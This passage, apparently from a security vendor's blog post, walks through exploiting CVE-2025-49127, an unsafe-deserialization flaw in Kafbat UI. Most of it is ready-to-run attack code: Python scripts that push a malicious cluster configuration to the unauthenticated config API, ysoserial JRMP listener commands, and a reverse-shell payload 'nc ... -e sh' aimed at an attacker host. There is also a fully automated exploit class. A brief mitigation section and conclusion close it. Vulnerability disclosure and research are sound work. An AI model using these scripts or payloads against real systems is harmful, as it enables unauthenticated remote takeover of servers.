print(f"[*] JMX Port: {JMX_PORT_INITIAL}")
print("[*] Make sure ysoserial JMX server is running on port 1718")
print()
send_malicious_config(JMX_PORT_INITIAL)
Step 3: Set Up Reverse Shell JMX Server
In a new terminal, set up the second malicious JMX server for the actual payload:
# Terminal 2: Set up reverse shell listener
nc -lvv 9094
# Terminal 3: Set up JMX server with reverse shell payloadjava -cp ysoserial-0.0.6-all.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7
`nc 192.168.1.100 9094 -e sh`
Step 4: Execute Main Exploit
Now execute the main exploit to get a reverse shell:
#!/usr/bin/env python3
"""
CVE-2025-49127 Exploit - Main Exploitation Phase
Executes reverse shell payload via unsafe deserialization
"""
import requests
import json
import time
# Configuration for the main exploit
KAFBAT_UI_URL = "http://localhost:8080"
ATTACKER_HOST = "192.168.1.100" # Replace with your host IP
JMX_PORT_EXPLOIT = 1719
REVERSE_SHELL_PORT = 9094
def exploit_rce():
"""Execute the main RCE exploit"""
config_payload = {
"config": {
"properties": {
"auth": {
"type": "DISABLED"
},
"rbac": {
"roles": []
},
"webclient": {},
"kafka": {
"clusters": [
{
"name": "local",
"bootstrapServers": "kafka0:29092",
"schemaRegistry": "http://schema-registry0:8085",
"ksqldbServer": "http://ksqldb0:8088",
"kafkaConnect": [
{
"name": "first",
"address": "http://kafka-connect0:8083"
}
],
"metrics": {
"type": "JMX",
"port": 9997
},
"properties": {},
"readOnly": False,
"audit": {
"topicAuditEnabled": True,
"consoleAuditEnabled": True,
"auditTopicProperties": {}
}
},
{
"name": "poc-rce",
"bootstrapServers": f"kafka-malicious-broker:9093",
"metrics": {
"type": "JMX",
"port": JMX_PORT_EXPLOIT # Port with RCE payload
},
"properties": {},
"readOnly": False
}
]
}
}
}
}
headers = {
"Content-Type": "application/json",
"Accept": "*/*",
"User-Agent": "CVE-2025-49127-Exploit/1.0"
}
try:
print("[*] Sending RCE payload...")
response = requests.put(
f"{KAFBAT_UI_URL}/api/config",
headers=headers,
json=config_payload,
timeout=30
)
print(f"[+] RCE payload sent")
print(f"[+] Status Code: {response.status_code}")
if response.status_code == 200:
print("[+] Exploit successful! Check your reverse shell listener.")
else:
print(f"[-] Unexpected response: {response.text}")
except requests.exceptions.RequestException as e:
print(f"[-] Error during exploitation: {e}")
def main():
print("[*] CVE-2025-49127 Exploitation - Phase 2: Remote Code Execution")
print(f"[*] Target: {KAFBAT_UI_URL}")
print(f"[*] Attacker Host: {ATTACKER_HOST}")
print(f"[*] JMX Port: {JMX_PORT_EXPLOIT}")
print(f"[*] Reverse Shell Port: {REVERSE_SHELL_PORT}")
print()
print("[!] Make sure you have:")
print(" 1. JMX server running on port 1719 with CommonsCollections7 payload")
print(" 2. Netcat listener running on port 9094")
print(" 3. Phase 1 exploit completed successfully")
print()
input("Press Enter when ready to exploit...")
exploit_rce()
if __name__ == "__main__":
main()
Step 5: Complete Automated Exploit
Here’s a complete automated exploit that combines both phases:
#!/usr/bin/env python3
"""
CVE-2025-49127 Complete Automated Exploit
Exploits unsafe deserialization in Kafbat UI JMX connection handling
"""
import requests
import json
import time
import subprocess
import threading
import socket
import sys
class CVE202549127Exploit:
def __init__(self, target_url, attacker_host, reverse_port=9094):
self.target_url = target_url.rstrip('/')
self.attacker_host = attacker_host
self.reverse_port = reverse_port
self.jmx_setup_port = 1718
self.jmx_exploit_port = 1719
def check_target_accessible(self):
"""Check if target is accessible"""
try:
response = requests.get(f"{self.target_url}/actuator/health", timeout=5)
return response.status_code == 200
except:
return False
def setup_reverse_listener(self):
"""Set up reverse shell listener"""
def listener():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', self.reverse_port))
sock.listen(1)
print(f"[+] Reverse shell listener started on port {self.reverse_port}")
conn, addr = sock.accept()
print(f"[+] Connection received from {addr}")
while True:
data = conn.recv(1024)
if not data:
break
print(data.decode(), end='')
except Exception as e:
print(f"[-] Error in reverse listener: {e}")
thread = threading.Thread(target=listener, daemon=True)
thread.start()
return thread
def setup_jmx_servers(self):
"""Setup malicious JMX servers using ysoserial"""
try:
# Setup JMX server for enabling unsafe deserialization
setup_cmd = [
'java', '-cp', 'ysoserial-0.0.6-all.jar',
'ysoserial.exploit.JRMPListener',
str(self.jmx_setup_port),
'ScalaProperties',
'org.apache.commons.collections.enableUnsafeSerialization:true'
]
print(f"[*] Starting JMX setup server on port {self.jmx_setup_port}")
setup_process = subprocess.Popen(setup_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait a moment for server to start
time.sleep(2)
# Setup JMX server for RCE payload
exploit_cmd = [
'java', '-cp', 'ysoserial-0.0.6-all.jar',
'ysoserial.exploit.JRMPListener',
str(self.jmx_exploit_port),
'CommonsCollections7',
f'nc {self.attacker_host} {self.reverse_port} -e sh'
]
print(f"[*] Starting JMX exploit server on port {self.jmx_exploit_port}")
exploit_process = subprocess.Popen(exploit_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(2)
return setup_process, exploit_process
except Exception as e:
print(f"[-] Error setting up JMX servers: {e}")
return None, None
def send_malicious_config(self, jmx_port, cluster_name):
"""Send malicious cluster configuration"""
config_payload = {
"config": {
"properties": {
"auth": {"type": "DISABLED"},
"rbac": {"roles": []},
"webclient": {},
"kafka": {
"clusters": [
{
"name": "local",
"bootstrapServers": "kafka0:29092",
"metrics": {"type": "JMX", "port": 9997},
"properties": {},
"readOnly": False
},
{
"name": cluster_name,
"bootstrapServers": "kafka-malicious-broker:9093",
"metrics": {
"type": "JMX",
"port": jmx_port
},
"properties": {},
"readOnly": False
}
]
}
}
}
}
headers = {
"Content-Type": "application/json",
"Accept": "*/*",
"User-Agent": "CVE-2025-49127-Exploit/1.0"
}
try:
response = requests.put(
f"{self.target_url}/api/config",
headers=headers,
json=config_payload,
timeout=30
)
return response.status_code == 200
except Exception as e:
print(f"[-] Error sending configuration: {e}")
return False
def exploit(self):
"""Execute the complete exploit"""
print("=" * 60)
print("CVE-2025-49127 Kafbat UI RCE Exploit")
print("=" * 60)
print(f"Target: {self.target_url}")
print(f"Attacker Host: {self.attacker_host}")
print(f"Reverse Shell Port: {self.reverse_port}")
print("=" * 60)
# Check target accessibility
print("[*] Checking target accessibility...")
if not self.check_target_accessible():
print("[-] Target not accessible. Please check the URL and network connectivity.")
return False
print("[+] Target is accessible")
# Setup reverse shell listener
print("[*] Setting up reverse shell listener...")
listener_thread = self.setup_reverse_listener()
time.sleep(1)
# Setup JMX servers
print("[*] Setting up malicious JMX servers...")
setup_proc, exploit_proc = self.setup_jmx_servers()
if not setup_proc or not exploit_proc:
print("[-] Failed to setup JMX servers")
return False
print("[+] JMX servers ready")
# Phase 1: Enable unsafe deserialization
print("[*] Phase 1: Enabling unsafe deserialization...")
if self.send_malicious_config(self.jmx_setup_port, "poc-setup"):
print("[+] Phase 1 successful")
else:
print("[-] Phase 1 failed")
return False
time.sleep(3)
# Phase 2: Execute RCE payload
print("[*] Phase 2: Executing RCE payload...")
if self.send_malicious_config(self.jmx_exploit_port, "poc-rce"):
print("[+] RCE payload sent successfully!")
print("[+] Check your reverse shell listener for incoming connection...")
print("[*] If successful, you should have a shell connection")
else:
print("[-] Failed to send RCE payload")
return False
# Keep processes alive for a while
print("[*] Keeping exploit servers alive for 60 seconds...")
time.sleep(60)
# Cleanup
try:
setup_proc.terminate()
exploit_proc.terminate()
except:
pass
return True
def main():
if len(sys.argv) != 3:
print("Usage: python3 exploit.py <target_url> <attacker_ip>")
print("Example: python3 exploit.py http://localhost:8080 192.168.1.100")
sys.exit(1)
target_url = sys.argv[1]
attacker_host = sys.argv[2]
exploit = CVE202549127Exploit(target_url, attacker_host)
success = exploit.exploit()
if success:
print("\n[+] Exploit completed successfully!")
else:
print("\n[-] Exploit failed!")
if __name__ == "__main__":
main()
Usage Example
# Make sure ysoserial is in the current directory
ls -la ysoserial-0.0.6-all.jar
# Run the complete exploit
python3 exploit.py http://localhost:8080 192.168.1.100
output:
# [+] Target is accessible
# [+] JMX servers ready
# [+] Phase 1 successful
# [+] RCE payload sent successfully!
# [+] Check your reverse shell listener for incoming connection...
Mitigation
To protect against CVE-2025-49127 and similar vulnerabilities, implement the following security measures:
Upgrade to Fixed Version:
# Update to Kafbat UI version 1.1.0 or later
docker pull ghcr.io/kafbat/kafka-ui:v1.1.0
Disable Dynamic Configuration:
# In docker-compose.yml or application configuration
environment:
DYNAMIC_CONFIG_ENABLED: 'false'
Conclusion
CVE-2025-49127 represents a critical security vulnerability in Kafbat UI 1.0.0 that demonstrates the dangers of unsafe deserialization in Java applications. The vulnerability stems from the application’s dynamic configuration feature, which allows unauthenticated users to specify arbitrary JMX endpoints without proper validation. When the application attempts to connect to these attacker-controlled JMX services, it becomes susceptible to Java deserialization attacks that can lead to complete system compromise. The vulnerability highlights several critical security principles that were violated in the original implementation: lack of input validation, absence of authentication requirements for sensitive operations, unsafe handling of external connections, and insufficient sandboxing of deserialization processes. The attack vector is particularly dangerous because it requires no authentication and can be exploited remotely through a simple HTTP request to the configuration API. Organizations using Kafbat UI should immediately upgrade to version 1.1.0 or later, implement proper authentication and authorization controls, and establish network segmentation to limit the blast radius of potential attacks. Additionally, implementing comprehensive monitoring and detection capabilities will help identify and respond to exploitation attempts. This vulnerability serves as a reminder of the importance of secure-by-default design principles and the need for thorough security testing of dynamic configuration features in enterprise applications.
For expert guidance on vulnerability management and/or penetration testing services contact SecureLayer7 to leverage tailored solutions and stay ahead of evolving security risks.